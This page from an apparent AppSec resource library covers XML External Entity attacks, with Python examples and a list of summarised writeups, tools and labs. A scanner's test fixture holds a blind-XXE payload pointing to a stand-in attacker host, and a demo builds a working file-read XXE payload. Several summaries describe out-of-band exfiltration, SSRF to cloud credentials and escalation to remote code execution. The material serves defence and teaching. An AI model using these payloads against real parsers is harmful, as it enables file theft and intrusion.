appsec.fyi

XML External Entity Processing (XXE) Resources


A curated AppSec resource library covering XSS, SQLi, SSRF, IDOR, RCE, XXE, OSINT, and more.

XML External Entity Processing (XXE)

An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, potentially leading to disclosure of confidential data, denial of service, server-side request forgery, and remote code execution.

XXE exploits a feature of the XML specification itself — the ability to define entities that reference external resources. When a parser resolves these entities, it can be tricked into reading local files (file:///etc/passwd), making HTTP requests to internal services, or exfiltrating data through out-of-band channels. Blind XXE variants use error-based or out-of-band techniques when direct output is not reflected to the attacker.

While XXE is often associated with SOAP APIs and legacy XML endpoints, it surfaces in unexpected places: file uploads (DOCX, XLSX, SVG are all XML-based), SAML authentication flows, RSS feed parsers, and configuration file processors. Any application that accepts XML input — even indirectly — may be vulnerable.
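Because the Office formats named above are zip archives of XML parts, an upload handler can refuse DTD-bearing documents before any XML parser sees them. The following is an added Python example, not code from appsec.fyi or from any resource listed on this page: it builds a minimal XLSX-shaped archive (a constructed sample, not a real workbook), scans every XML part for the markers that XXE payloads depend on, and reports what it finds. The attacker host in the poisoned sample is a placeholder.

```python
"""Pre-parse scan of an OOXML (DOCX/XLSX/PPTX) upload for XXE building blocks."""
import io
import re
import zipfile

# A DOCTYPE in any OOXML part is already suspicious: the OOXML schemas never
# use DTDs, so benign documents produced by Office or LibreOffice contain none.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# SYSTEM/PUBLIC entity declarations, including parameter entities (% name),
# are what file-read, SSRF and blind out-of-band payloads are made of.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
# XInclude reaches local files without any DTD, so flag the namespace too.
XINCLUDE_RE = re.compile(
    rb"xmlns(?::\w+)?\s*=\s*[\"']http://www\.w3\.org/2001/XInclude[\"']"
)


def scan_ooxml(data: bytes) -> list:
    """Return (part_name, reason) findings for an OOXML archive; [] means clean."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # .rels parts are XML as well and are parsed by every OOXML library.
            if not info.filename.endswith((".xml", ".rels")):
                continue
            part = zf.read(info.filename)
            if DOCTYPE_RE.search(part):
                findings.append((info.filename, "DOCTYPE declaration"))
            if EXTERNAL_ENTITY_RE.search(part):
                findings.append((info.filename, "external entity declaration"))
            if XINCLUDE_RE.search(part):
                findings.append((info.filename, "XInclude namespace"))
    return findings


def build_sample(workbook_xml: bytes) -> bytes:
    """Constructed XLSX-shaped zip: just enough parts to exercise the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        zf.writestr("xl/workbook.xml", workbook_xml)
    return buf.getvalue()


CLEAN_WORKBOOK = (
    b'<?xml version="1.0"?>'
    b'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheets/></workbook>'
)
# Constructed blind-XXE payload: a parameter entity pulling an external DTD
# from a placeholder attacker host, the pattern tools such as XXElixir inject.
POISONED_WORKBOOK = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE x [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
    b'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheets/></workbook>'
)

if __name__ == "__main__":
    print("clean   :", scan_ooxml(build_sample(CLEAN_WORKBOOK)))
    print("poisoned:", scan_ooxml(build_sample(POISONED_WORKBOOK)))
```

This check is defence in depth, not the fix: a byte-pattern scan misses UTF-16 or UTF-7 encoded parts (the Intigriti guide listed below mentions UTF-7 as an evasion), so the parser that eventually reads these parts still has to be configured with DTDs disabled.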

Prevention centers on disabling external entity resolution and DTD processing in XML parsers, but the configuration varies significantly across languages and libraries, making it a persistent source of vulnerabilities.
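To make the contrast concrete, here is an added Python example (not code from this page or from any of the referenced resources) that feeds one classic XXE payload to two parser configurations built on the standard library's expat binding. expat never fetches external entities by itself; the permissive resolver below spells out what a weakly configured libxml2- or Xerces-style parser does by default, and the hardened variant rejects any DOCTYPE, which is the posture the OWASP cheat sheet recommends. The "secret" is a constructed stand-in for /etc/passwd written to a temporary file.

```python
"""One XXE payload against a permissive and a hardened XML parser configuration."""
import os
import tempfile
import urllib.request
from pathlib import Path
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised by the hardened parser as soon as a DOCTYPE appears."""


def _permissive_resolver(parser):
    """External entity resolver with no scheme check and no allowlist.

    This reproduces the default behaviour of a vulnerable parser: file://,
    http:// and friends are all fetched and their content is spliced in.
    """
    def resolve(context, base, system_id, public_id):
        with urllib.request.urlopen(system_id) as resp:   # the XXE / SSRF sink
            content = resp.read()
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(content, True)   # entity text flows into the same handlers
        return 1
    return resolve


def parse_xml(data: bytes, resolve_external_entities: bool) -> str:
    """Parse `data` and return the document's concatenated character data."""
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append
    if resolve_external_entities:
        parser.ExternalEntityRefHandler = _permissive_resolver(parser)
    else:
        # Hardened: refusing the DOCTYPE removes external entities, parameter
        # entities and entity-expansion DoS (Billion Laughs) in one move.
        def reject_doctype(name, system_id, public_id, has_internal_subset):
            raise DTDForbidden("DOCTYPE declarations are not accepted")
        parser.StartDoctypeDeclHandler = reject_doctype
        parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)
    return "".join(text)


def demo() -> dict:
    """Run the same payload through both configurations and report the outcome."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"   # constructed stand-in for /etc/passwd
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
    try:
        payload = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{Path(fh.name).as_uri()}">]>'
            '<data>&xxe;</data>'
        ).encode()
        leaked = parse_xml(payload, resolve_external_entities=True)
        try:
            parse_xml(payload, resolve_external_entities=False)
            blocked = False
        except DTDForbidden:
            blocked = True
        return {"leaked": leaked, "secret": secret, "blocked": blocked}
    finally:
        os.unlink(fh.name)


if __name__ == "__main__":
    outcome = demo()
    print("permissive parser returned:", repr(outcome["leaked"]))
    print("hardened parser blocked the DOCTYPE:", outcome["blocked"])
```

The permissive run returns the file's contents as ordinary element text, which is exactly how in-band XXE surfaces in an application response; the hardened run fails before a single entity is declared. For production Python code, defusedxml (or lxml with `resolve_entities=False` and `no_network=True`) gives the same outcome without hand-written handlers; the point of the hand-written version is to show where the decision is made.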

This page collects XXE research, exploitation techniques, parser-specific bypass methods, and real-world bug bounty writeups.

From OWASP

Date Added [Tags] Link, followed on the indented line by the excerpt and, where recorded, the source site
2026-04-22 [news] GeoServer 2025 XXE Vulnerability (CVE-2025-58360) Explained
2026-04-22 [news] Critical Apache Tika Vulnerability Leads to XXE Injection
    Writeup of CVE-2025-66516, a critical XXE injection vulnerability in Apache Tika affecting tika-core, tika-pdf-module and tika-parsers. Attackers can exploit the flaw via crafted XFA files embedded in PDFs, potentially leading to information leaks, SSRF, DoS or RCE. The issue expands the scope of an earlier vulnerability, CVE-2025-54988. Patches are available in tika-core 3.2.2, tika-parser-pdf-module 3.2.2 and tika-parsers 2.0.0. → securityweek.com
2026-04-22 [news] CVE-2025-30220: GeoServer WFS Service XML External Entity
    Writeup of CVE-2025-30220, an XXE vulnerability in GeoServer's WFS service that lets unauthenticated remote attackers exfiltrate arbitrary local files (information disclosure) and perform Server-Side Request Forgery (SSRF). The payload bypasses GeoServer's allowlist by exploiting how the GeoTools library processes XSD schema representations.
2026-04-22 [news] CVE-2025-27136: LocalS3 CreateBucketConfiguration XXE Injection
    Writeup of CVE-2025-27136, an XXE injection vulnerability in LocalS3's CreateBucketConfiguration endpoint that allows attackers to read sensitive files. The flaw stems from an XML parser that does not disable external entity resolution; exploitation is a crafted XML payload with a `<!DOCTYPE>` declaration and a `file://` URI that retrieves files such as `/etc/passwd`. Mitigation: update LocalS3 or configure the XML parser to disable external entity resolution.
2026-04-22 [intermediate] CVE-2024-30043: Exploiting XXE on SharePoint via Confused URL Parsing (PoC)
2026-04-22 [news] CVE-2025-66516: Detecting and Defending Against Apache Tika XXE
    → akamai.com
2026-04-19 [news] IBM Business Automation Workflow XXE (CVE-2025-13096)
    IBM bulletin for CVE-2025-13096, an XML external entity injection vulnerability in IBM Business Automation Workflow. The flaw, which the bulletin files under CWE-918 (Server-Side Request Forgery), allows remote attackers to expose sensitive information or consume memory resources. IBM recommends applying the Interim Fix (iFix) or Cumulative Fix (CF) containing DT456229.
2026-04-19 [beginner] XXE Vulnerability Guide 2025: How XML Attacks Still Threaten
    Library of techniques and code examples for understanding and mitigating XXE in modern applications. Covers file disclosure, server-side request forgery (SSRF) and denial-of-service exploits such as the "Billion Laughs" attack, with attention to SOAP APIs, SVG file uploads and legacy systems. Cites Akamai CloudTest (CVE-2025-49493) and Ambari/Oozie (CVE-2025-23195) as examples of attackers reaching sensitive files and internal network resources.
2026-04-19 [news] XXE Injection in langchain-community (CVE-2025-6984)
    Writeup of CVE-2025-6984, an XXE injection vulnerability in langchain-community. Insecure use of `etree.iterparse()` lets attackers read sensitive local files and potentially cause denial of service with crafted XML payloads. Versions prior to 0.3.27 are affected; upgrade to 0.3.27 or later. → security.snyk.io
2026-04-19 [news] Critical Apache Tika CVE-2025-66516: XXE Vulnerability
    Library for securing applications against Apache Tika CVE-2025-66516. Crafted PDF files with malicious XFA content achieve sensitive file disclosure, SSRF and potential RCE. Specific versions of `tika-core`, `tika-parser-pdf-module` and `tika-parsers` are affected; the flaw has seen active exploitation in the wild, with over 500 vulnerable instances reported. → rescana.com
2026-04-19 [news] XXE in GeoServer WFS Service (CVE-2025-30220)
    Writeup of CVE-2025-30220, an XXE vulnerability in GeoServer's WFS service. Originating in the GeoTools library's handling of XML schemas, it bypasses entity resolution controls and allows information disclosure via out-of-band exfiltration and SSRF through crafted XML payloads. Affected: 2.27.0, 2.26.0 to 2.26.2, and versions prior to 2.25.7. Fixed in 2.27.1, 2.26.3 and 2.25.7.
2026-04-16 [intermediate] XXElixir: Tool for Testing XXE via XLSX File Upload Poisoning
    Tool for testing XXE via poisoned XLSX uploads. XXElixir injects custom XML content or an out-of-band URL for external entity retrieval by unzipping the XLSX, modifying workbook.xml and re-zipping it into a new file for use against applications that accept XLSX uploads.
2026-04-16 [intermediate] Exploiting XXE via File Uploads (SVG, XLSX, DOCX)
    → exploit-db.com
2026-04-16 [intermediate] XXE-OOB-Exfiltrator: Multi-line Content Exfiltration via External DTD
    Tool for exploiting out-of-band XXE to exfiltrate file contents or directory listings. It runs a self-hosted HTTP server for external DTD inclusion and a simulated FTP server for receiving data, supporting multi-line exfiltration via `ftp://` and Base64-encoded exfiltration via `php://`. Single or multiple files (from a wordlist) can be exfiltrated, with automatic exploit triggering from JSON request files, output redirection and proxy support.
2026-04-16 [intermediate] Blind XXE Attacks: Out of Band Interaction Techniques to Exfiltrate Data
    Technique writeup on blind XXE using Out-of-Band Application Security Testing (OAST) to exfiltrate data. Covers crafting malicious DTDs, XML parameter entities, extraction over HTTP and FTP, and wrapping unparsable file contents in CDATA sections. References Burp Collaborator for OAST interactions and PortSwigger labs for practice.
2026-04-16 [intermediate] Exploiting Out-Of-Band XXE on Wildfire
    Writeup of out-of-band XXE exploitation through the HTTP LOCK method, found during a red-team engagement. The author enumerates enabled HTTP methods that accept XML input (LOCK among them), then crafts an external DTD to exfiltrate `/etc/passwd` and sensitive configuration files, and shares a nuclei template for detecting the issue across many instances.
2026-04-16 [beginner] Out-of-Band XML External Entity (OOB XXE)
    Writeup on OOB XXE, showing how attackers exfiltrate data such as `/etc/passwd` through attacker-controlled HTTP servers and external DTDs. It contrasts OOB XXE with blind XXE and provides a proof-of-concept. The article stresses that disabling external entity processing and external DTD support, as OWASP recommends, is the only effective prevention against both in-band and OOB XXE. → invicti.com
2026-04-16 [beginner] Top HackerOne XXE Reports
    Collection of XXE reports disclosed on HackerOne across Starbucks, Mail.ru, X, DuckDuckGo, Pornhub, Informatica, Semrush, Zivver, U.S. Dept of Defense, Rockstar Games, Uber, QIWI, WordPress, drchrono, Evernote, VK.com, Adobe, Bime, Moneybird and Coinbase. The reports cover vectors such as SVG uploads, JPEG metadata injection, blind XXE and SSRF, some of which led to Remote Code Execution (RCE).
2026-04-16 [intermediate] How to Find XXE Bugs: Severe, Missed, and Misunderstood
    → bugcrowd.com
2026-04-16 [advanced] A Deep Dive Into XXE Injection (Synack)
    Library on XXE injection, a vulnerability found wherever an XML parser exists, not only in web applications. Explains how ENTITY declarations within Document Type Definitions (DTDs) can be manipulated, including in POST requests intercepted with Burp Suite, to exfiltrate local files such as `/etc/passwd` or to use out-of-band techniques with external DTDs.
2026-04-16 [beginner] Top 25 XXE Bug Bounty Reports
    → corneacristian.medium.com
2026-04-10 [news] XXE in Apache Struts CVE-2025-68493
2026-04-10 [intermediate] PortSwigger Blind XXE Lab Write-up
2026-04-10 [intermediate] Out-of-Band XXE Attack with Sensitive Data Exfiltration
2026-04-10 [advanced] Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE
    Writeup of advanced XXE techniques: local file disclosure of `/etc/passwd` and `config.php`, bypassing character restrictions with `php://filter` and Base64 encoding, blind XXE via DNS and HTTP out-of-band (OOB) exfiltration, and remote code execution on misconfigured PHP servers through the `expect://` wrapper, demonstrated against a target.com endpoint.
2026-04-10 [beginner] XXE Injection Overview
2026-04-10 [intermediate] Exploiting Blind XXE: Data Exfiltration Through External DTD
2026-04-10 [intermediate] PortSwigger XXE Injection Writeups
    Writeups for nine PortSwigger XXE labs. Techniques: retrieving `/etc/passwd` and `/etc/hostname`, SSRF against the EC2 metadata endpoint to obtain IAM credentials, bypassing restrictions with XInclude and parameter entities, out-of-band exfiltration via Burp Collaborator, repurposing local DTDs to leak data through error messages, and XXE via SVG image uploads.
2026-04-10 [intermediate] Blind XXE Lab: Exfiltrate Data Using Malicious External DTD
    Lab demonstrating blind XXE with out-of-band exfiltration using Burp Suite Professional and an exploit server. A malicious external DTD defines an entity that reads `/etc/hostname` and triggers an interaction with Burp Collaborator, which reveals the exfiltrated data in the resulting DNS and HTTP requests. → portswigger.net
2026-04-10 [beginner] XML External Entity - GeeksforGeeks
    Library on preventing XXE by disabling external entity processing or validating input. XXE can lead to information disclosure, SSRF, DoS and code execution through untrusted XML parsing, illustrated with a PortSwigger lab that retrieves a file via an external entity reference. Mitigation includes updating XML libraries and secure development practices. → geeksforgeeks.org
2026-04-10 [intermediate] Cisco ISE XXE Information Disclosure
2026-04-10 [advanced] XXE Injection: Advanced Exploitation Guide
    Guide to identifying and exploiting XXE, covering commonly vulnerable components, simple XXE-to-SSRF attacks, filter bypasses with external DTDs and parameter entities, and resource exhaustion via the "Billion Laughs" attack. Also notes UTF-7 encoding as a possible evasion method. → intigriti.com
2026-04-10 [beginner] XXE Complete Guide: Impact, Examples, and Prevention
    Reference on XXE vulnerabilities and their impact (denial of service, data exposure, SSRF), with mitigation strategies including Web Application Firewalls (WAFs) and application server instrumentation. Examples cover resource exhaustion, data extraction via `file://` URIs, SSRF against internal systems and blind XXE for out-of-band exfiltration. → hackerone.com
2026-04-10 [news] CVE-2025-49493: XXE in Akamai CloudTest
    Writeup of CVE-2025-49493, an XXE vulnerability in Akamai CloudTest discovered by XBOW. Reachable through several SOAP endpoints such as `/concerto/services/RepositoryService`, it allowed unauthorized access to sensitive data including `/etc/passwd` via external DTDs and error-based exfiltration. Akamai fixed the issue by disabling DTD processing entirely.
2026-04-06 [news] CVE-2025-11035: Jinher OA XXE Vulnerability
    Writeup of CVE-2025-11035, an XXE vulnerability in Jinher OA 2.0 affecting the ManageWord.aspx endpoint. Authenticated remote attackers can exfiltrate data, perform SSRF and reach internal network resources by manipulating XML input to reference external entities. Mitigations: input validation, WAF rules that block DOCTYPE declarations, and parser configuration that disables DTD processing. → sentinelone.com
2026-04-06 [news] CVE-2025-54254: Adobe Experience Manager Forms XXE Vulnerability
    Analysis of CVE-2025-54254, an XXE vulnerability in Adobe Experience Manager Forms 6.5.23 and earlier. Improper handling of XML external entity references (CWE-611) lets unauthenticated attackers read arbitrary files from the server without user interaction by submitting crafted XML to vulnerable endpoints. Mitigation: apply Adobe's patch (APSB25-82), configure XML parsers to disable external entities, or deploy WAF rules that block XXE patterns. → sentinelone.com
2026-04-06 [news] CVE-2026-29924: XXE Vulnerability
    → tenable.com
2026-04-06 [news] CVE-2026-34401: XXE in Wwbn Avideo
    Writeup of CVE-2026-34401, an XXE vulnerability in Wwbn Avideo before 2.9.0.21. It stems from XML Notepad's default resolution of external entities during DTD processing, so a crafted XML file can trigger outbound HTTP/SMB requests that leak local file contents or capture user NTLM credentials. Patched in 2.9.0.21.
2026-04-03 [advanced] Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE
    Writeup of advanced XXE techniques: local file disclosure of `/etc/passwd` and `config.php`, bypassing character restrictions with PHP filters for Base64 encoding, and blind XXE via DNS and HTTP exfiltration. It then escalates XXE to RCE on misconfigured PHP servers through the `expect://` wrapper and establishes persistence with a reverse shell.
2026-04-03 [beginner] What is XXE (XML External Entity) | Examples & Prevention | Imperva
    Library on XXE vulnerabilities, attack vectors and mitigations. Explains how XXE arises from parsing XML input that contains external entities, enabling data exfiltration, denial of service and interaction with internal systems or the underlying operating system. Prevention: disable external entity processing in XML parsers and validate input. → imperva.com
2026-04-03 [beginner] XML External Entities (XXE) | Pentesting Notes
2026-04-03 [beginner] XML External Entity (XXE) Processing | OWASP
    Reference on XXE processing (CWE-611): applications parsing XML with weakly configured parsers, leading to sensitive data disclosure, denial of service, SSRF and possibly code execution. Covers how external entities are defined and processed, with examples of local file access (`file:///etc/passwd`) and remote resource inclusion (`http://www.attacker.com/text.txt`), and recommends disabling DTD processing. → owasp.org
2026-04-03 [advanced] Blind XXE: Exfiltrating Data Out-of-Band in 2025
    Library on blind XXE, where the application does not reflect entity values in responses. Covers out-of-band exfiltration with parameter entities and malicious DTDs, error-based exploitation and abuse of local DTD files, plus protocol handlers: FTP for exfiltration, HTTP/HTTPS for SSRF and `file://` variations. Scenarios include internal network reconnaissance, cloud metadata access and database configuration files, with a mention of CVE-2024-5919 in Palo Alto Networks PAN-OS.
2026-04-03 [advanced] Comprehensive Guide to XXE Exploitation: Advanced Data Exfiltration and RCE
    Guide to advanced XXE exploitation: identifying vulnerable XML endpoints with Burp Suite, testing for basic XXE, bypassing input validation with `php://filter`, blind XXE via HTTP and DNS out-of-band exfiltration, and RCE through wrappers such as `expect://` and web shell deployment. Discusses information disclosure (CWE-200) and SSRF.
2026-04-03 [beginner] XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack
    Guide to XXE showing how attackers abuse XML parsers to read files such as /etc/passwd, perform internal network reconnaissance and, in some cases, achieve remote code execution. Explains how external entity declarations in XML input lead to file disclosure, SSRF and denial of service, and why XXE persists through legacy code, explicitly enabled features or custom parser configurations in document processors (DOCX, XLSX), API endpoints, SOAP services and SVG handlers. → yeswehack.com
2026-04-03 [beginner] XML External Entity (XXE) Attack Guide | Hackviser
    Guide to XXE with manual testing techniques for XML inputs including file uploads and SOAP requests. Covers local file disclosure, SSRF via HTTP callbacks and PHP wrappers, denial of service such as the "Billion Laughs" attack, and automated discovery with Burp Suite, XXEinjector and Nuclei.
2026-04-03 [beginner] What is a Blind XXE Attack? | PortSwigger
    Reference on finding and exploiting blind XXE, where the application does not return entity values directly. Covers detection via out-of-band (OAST) methods, exfiltration of files such as `/etc/passwd` through HTTP requests or by triggering parsing errors that embed file contents, XML parameter entities and repurposing local DTDs. → portswigger.net
2025-08-14 [intermediate, SSRF] Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles
    Writeup by Gupta Bles on turning an XXE vulnerability into SSRF to retrieve the IAM credentials of an EC2 instance, and why XXE must be fixed to keep such credentials out of reach.
2025-08-14 [intermediate] XXE - Things Are Getting Out of Band
    Library on out-of-band XXE, covering exfiltration over FTP and HTTP against vulnerable Java and ASP.NET applications, with XML payloads that trigger external requests carrying file contents such as `/etc/passwd`. Briefly covers RCE via XXE in ASP.NET by downloading a webshell. → blog.zsec.uk
2025-08-14 [beginner] https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi
    Slide deck "XXE: how to become a Jedi" covering XXE basics and impact, how to identify and mitigate the vulnerability, the role of XML parsing and secure coding practices, and practical examples with pointers for further learning. → slideshare.net
2025-08-14 [intermediate] Hunting in the Dark - Blind XXE
    Writeup of blind XXE against a JSON endpoint that also parses XML. The author finds the XML processing by changing the `Content-Type` header, then uses error-based responses to port-scan the backend, exploiting Java `UnmarshalException` errors and SSRF to probe ports such as 8080. → blog.zsec.uk
2025-08-14 [intermediate] XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)_HackDig
    Library on detecting and exploiting XXE against a range of targets, including Apple iOS's Office Viewer, with practical notes on using XXE in broader security assessments.
2025-08-14 [intermediate] GDS - Blog - Automated Data Exfiltration with XXE
    GDS blog post on automating data exfiltration through XXE: driving XML parser weaknesses programmatically to extract data from a target, the risk this poses and how organizations can protect themselves.
2025-08-14 [intermediate] Advice From A Researcher: Hunting XXE For Fun and Profit
    Researcher's advice on hunting XXE: techniques and strategies for finding and exploiting XXE flaws in software and systems, and the rewards of doing so.
2025-08-14 [intermediate] Tool for automatic exploitation of XXE vulnerability using direct and diffe
    XXEinjector automates XXE exploitation with direct and out-of-band file retrieval. It lists directories on Java applications and brute-forces paths elsewhere; features include out-of-band channels (FTP, HTTP, Gopher), direct exploitation with custom marks, CDATA for direct exploitation, PHP filters for Base64 encoding, Windows hash retrieval, file upload via the Java JAR scheme, command execution with PHP expect, and XSLT injection testing.
2025-08-14 2025h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE) beginnerWriteup on identifying XML External Entity (XXE) vulnerabilities, detailing methods to confirm entity interpretation, system entity usability, and data exfiltration using external DTDs and the gopher protocol. It covers techniques for testing parser capabilities and specific exploitation scenarios, including references to related attacks like CVE-2013-6397. Mitigation strategies involve disabling SYSTEM entities and updating Java Virtual Machine versions.
2025-08-14 202510 Types of Web Vulnerabilities that are Often Missed - Detectify Labs beginner SSRF XSSLibrary detailing ten often-missed web vulnerabilities including HTTP/2 Smuggling, XXE via Office Open XML Parsers, SSRF via XSS in PDF Generators, and XSS via SVG files. The content highlights how to identify and exploit these vulnerabilities, referencing tools like http2smugl and concepts such as HTTP desync attacks and AWS metadata endpoints. It also points to research from Hakluke, Farah Hawa, and James Kettle. → labs.detectify.com
2025-08-14 2025https://www.hahwul.com/2019/09/28/oxml-xxe-payload-inject-tool-docem/ intermediate Bug BountyThe content discusses a tool called "Docem" developed by a security researcher for injecting XXE payloads into OXML files. It explains how the tool can be used to exploit XML External Entity vulnerabilities in OXML documents, potentially leading to data theft or system compromise. The article provides details on the tool's features, usage, and examples of injecting payloads. It aims to raise awareness about the risks associated with XXE vulnerabilities in OXML files and emphasizes the importance of securing systems against such attacks.
2025-08-14 2025Awesome Bug Bounty Tools beginner Bug Bounty ReconLibrary of curated bug bounty tools, featuring extensive lists for subdomain enumeration with tools like Subfinder, Findomain, and massdns, alongside port scanning utilities such as Nmap, RustScan, and naabu. It also includes web screenshotting and fingerprinting tools like EyeWitness, gowitness, and whatweb, as well as content discovery tools like gobuster and feroxbuster, covering vulnerabilities such as XSS, SQL Injection, and Directory Traversal.
2025-08-14 2025https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ intermediate Burp XSSLibrary for Burp Suite that accelerates manual penetration testing by offering pre-defined payloads for common vulnerabilities. HackBar integrates with Burp Suite's Repeater and Proxy tabs, providing dropdown lists of attack strings for SQL Injection, Cross-Site Scripting (XSS), Local File Inclusion (LFI), XXE Injection, and OS Command Injection, significantly reducing the time spent on manual payload insertion and testing against applications like bWAPP and Acunetix.
2025-08-14 2025https://gosecure.github.io/xxe-workshop/#0 beginnerWorkshop slides detailing XML External Entity (XXE) exploitation techniques for PHP and Java applications. This resource covers identifying XXE vulnerabilities and converting them into directory listing, file exfiltration, file write, and remote code execution via classic XML patterns, out-of-band DTD techniques, and FTP/Gopher protocols. It includes four lab applications, sample payloads, and Docker recipes for deployment.
2025-08-14 2025XXE-study/xxe.php at master · HLOverflow/XXE-study intermediateThe content refers to a file named "xxe.php" within the "XXE-study" repository on GitHub owned by "HLOverflow." This file is located in the "master" branch of the repository. The term "XXE" likely stands for XML External Entity, a type of security vulnerability. The content does not provide specific details about the file or its purpose, but it suggests that it is part of a study or project related to XXE vulnerabilities.
2025-08-14 2025XXE - XEE - XML External Entity - HackTricks beginnerLibrary detailing XML External Entity (XXE) vulnerabilities. It explains XML entities, DTDs, and custom/external entity definitions, highlighting how parsers can be exploited. The resource covers techniques for detecting XXE using parameter entities, including out-of-band detection methods and attempts to read local files like `/etc/passwd` and `C:\windows\system32\drivers\etc\hosts`. It also demonstrates advanced exfiltration strategies using malicious external DTDs to send file contents via HTTP requests or display them within error messages, and explores XXE for SSRF attacks against cloud metadata endpoints. → book.hacktricks.xyz
2025-08-14 2025Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag beginnerThe content discusses XXE (XML External Entity Injection) vulnerabilities, a type of attack where an attacker can manipulate XML input to access sensitive data or execute remote code. XXE exploits can lead to data theft, server-side request forgery, and denial of service attacks. Understanding XXE vulnerabilities is crucial for security professionals to prevent such attacks and protect systems from exploitation. The article likely provides insights into detecting, preventing, and mitigating XXE vulnerabilities to enhance cybersecurity measures.
2025-08-14 | https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html [intermediate] | Writeup detailing XXE exploitation when HTTP out-of-band is blocked, using verbose XML parsing errors to exfiltrate local files. It covers bypassing the Cloudflare WAF by omitting XML declarations and adding spaces to file protocols, then explores advanced techniques like exploiting local DTDs found with tools such as GoSecure's `dtd-finder` to overwrite existing entities. The exploit leverages the `jar` protocol on Java applications to read files from archives and inject them into error messages, revealing sensitive data like `/etc/passwd`.
2025-08-14 | XML External Entity Prevention · OWASP Cheat Sheet Series [beginner] | Library that guides developers in preventing XML External Entity (XXE) injection vulnerabilities, a common OWASP Top 10 threat. It details specific configurations for various XML parsers across languages like Java (JAXP, DOM4J), C++ (libxml2, libxerces-c), and ColdFusion (Adobe, Lucee), emphasizing the critical need to disable DOCTYPE declarations and external entity loading to mitigate risks like SSRF and denial-of-service attacks. → cheatsheetseries.owasp.org
2025-08-14 | https://portswigger.net/web-security/xxe [beginner] | Library detailing XML external entity (XXE) injection, a web security vulnerability allowing attackers to interfere with XML data processing. It covers exploiting XXE to retrieve files, perform server-side request forgery (SSRF), and exfiltrate data via blind XXE techniques. The library also discusses XInclude attacks and XXE vulnerabilities in file uploads, specifically mentioning the SVG format. → portswigger.net
2025-08-14 | From blind XXE to root-level file read access – Honoki [advanced] | Writeup detailing blind XXE exploitation, focusing on error message analysis to identify the Java SAX parser and infer firewall behavior. The technique successfully enumerated internal services and reached internal applications like wiki.company.internal, demonstrating how to elevate a medium-criticality XXE vulnerability to a critical finding.
2025-08-14 | XXE - XML External Entity Attack [beginner] | XXE, or XML External Entity Attack, is a type of security vulnerability where an attacker can exploit the processing of XML data by including external entities that can disclose confidential information, execute remote code, or cause a denial of service. This attack can occur when an application processes XML input without proper validation and allows external entities to be included. Preventing XXE attacks involves disabling external entity processing, using whitelists for allowed entities, and validating input data to ensure it does not contain malicious XML entities. → slideshare.net
2025-08-14 | XXE at Bol.com – Jonathan Bouman – Medium [intermediate] | A post titled "XXE at Bol.com" by Jonathan Bouman on Medium. It likely discusses an XML External Entity (XXE) vulnerability found at Bol.com, a Dutch online retailer. XXE vulnerabilities can allow attackers to exploit XML processing functionality and access sensitive data. The post may cover the impact of this vulnerability on Bol.com's security and how it was discovered or addressed; see the full post on Medium for details.
2024-11-10 | GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) [intermediate, XSS] | Tool for embedding XXE and XSS payloads into document formats like DOCX, ODT, and PPTX. This utility operates by identifying "magic symbols" within sample documents and replacing them with specified payloads. It offers flexible payload injection modes, allowing for placement per document, per file, or per specific location, and supports custom payload files for both XXE and XSS vulnerabilities. Docem aims to improve upon the usability of tools like oxml_xxe for large-scale payload generation.
2024-10-17 | B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF [intermediate, SSRF, XSS] | "B-XSSRF is a toolkit designed to detect and monitor Blind XSS, XXE, and SSRF vulnerabilities. The setup involves uploading files to a server and creating a database. The toolkit helps in identifying and tracking these security issues to enhance the overall security posture of a system." → kitploit.com
2024-09-21 | XXE : From Zero to Hero [beginner] | Hello fellow hackers, I hope you all are doing good and learning something new :). As I said in my RECON blog I will be writing about… → infosecwriteups.com
2023-11-07 | 11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023 [intermediate, SSRF] | The content discusses a lab on exploiting XML External Entity (XXE) vulnerabilities to carry out Server-Side Request Forgery (SSRF) attacks. The lab demonstrates how XXE can be leveraged to manipulate server-side requests and potentially reach sensitive information or internal resources, and likely involves hands-on exercises covering the exploitation process and its security implications. Participants gain practical experience in identifying and mitigating XXE vulnerabilities. → cyberw1ng.medium.com
